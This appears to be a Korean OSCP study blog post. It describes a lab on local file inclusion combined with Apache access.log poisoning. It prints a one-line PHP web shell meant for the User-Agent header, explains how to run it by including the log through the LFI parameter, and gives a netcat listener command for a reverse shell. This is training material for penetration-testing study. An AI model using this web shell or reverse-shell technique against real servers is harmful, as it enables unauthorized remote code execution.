λ³Έλ¬Έ λ°”λ‘œκ°€κΈ°
  • Tried. Failed. Logged.
🏴CTF/OSCP

OSCP - 9.2. File Inclusion Vulnerabilities, Labs Local File Inclusion (LFI) 및 access.log ν¬μ΄μ¦ˆλ‹ 취약점

by Janger 2025. 7. 21.
728x90

 

access.log ν¬μ΄μ¦ˆλ‹(μ˜€μ—Ό)

User-Agent 헀더에 ν•œμ€„ 짜리 μ›Ήμ‰˜ μ½”λ“œλ₯Ό λ„£λŠ”λ‹€. <?php echo system($_GET['cmd']); ?> 이후 μ„œλ²„λ‘œ λΆ€ν„° μš”μ²­μ΄ κ°€κ²Œ 되면 μ„œλ²„ 츑에 μ•„νŒŒμΉ˜ 둜그 파일인 /var/log/apache2/access.log(μœˆλ„μš° μ˜ˆμ‹œ: C:\xampp\apache\logs\access.log)μ—λŠ” μ‚¬μš©μžμ˜ λ°©λ¬Έ 정보(아이피 μ£Όμ†Œ, 경둜, User-Agent)κ°€ λ‚¨κ²Œ λœλ‹€. 

 

 

이제 LFI 취약점이 μžˆλŠ” νŒŒλΌλ―Έν„°μ—λ‹€ /var/log/apache2/access.logλ₯Ό μž…λ ₯을 ν•΄ νŒŒμΌμ„ 읽어 였게 λ˜λ©΄μ„œ ν•΄λ‹Ή PHP μ½”λ“œκ°€ μ‹€ν–‰λ˜λ©΄μ„œ 원격 μ½”λ“œ μ‹€ν–‰ 취약이 λ°œμƒν•œλ‹€. (*cmd νŒŒλΌλ―Έν„° μ•žμ—λŠ” ?κ°€ μ•„λ‹Œ &이 올 것)

 

 

nc -nvlp 4444

μ’€ 더 μ›ν™œν•œ μ œμ–΄λ₯Ό μœ„ν•œ 경우 κ³΅κ²©μžλŠ” λ¦¬λ²„μŠ€μ‰˜μ„ μ—΄μ–΄ λŒ€μƒ μ„œλ²„κ°€ 연결을 μš”μ²­ν•˜κ²Œλ” ν•  μˆ˜λ„ μžˆλ‹€. 

 

 

이 λ•Œ GET 방식인 경우 λͺ…λ Ήμ–΄ λ‚΄μš©μ€ URL 인코딩이 μΆ”κ°€μ μœΌλ‘œ ν•„μš”λ‘œ ν•˜λ‹€. 

 

728x90

'🏴CTF > OSCP' μΉ΄ν…Œκ³ λ¦¬μ˜ λ‹€λ₯Έ κΈ€

OSCP - 9.2.2. PHP Wrappers  (0) 2025.07.21
OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is 취약점  (0) 2025.07.21

κ΄€λ ¨κΈ€

ν‹°μŠ€ν† λ¦¬νˆ΄λ°”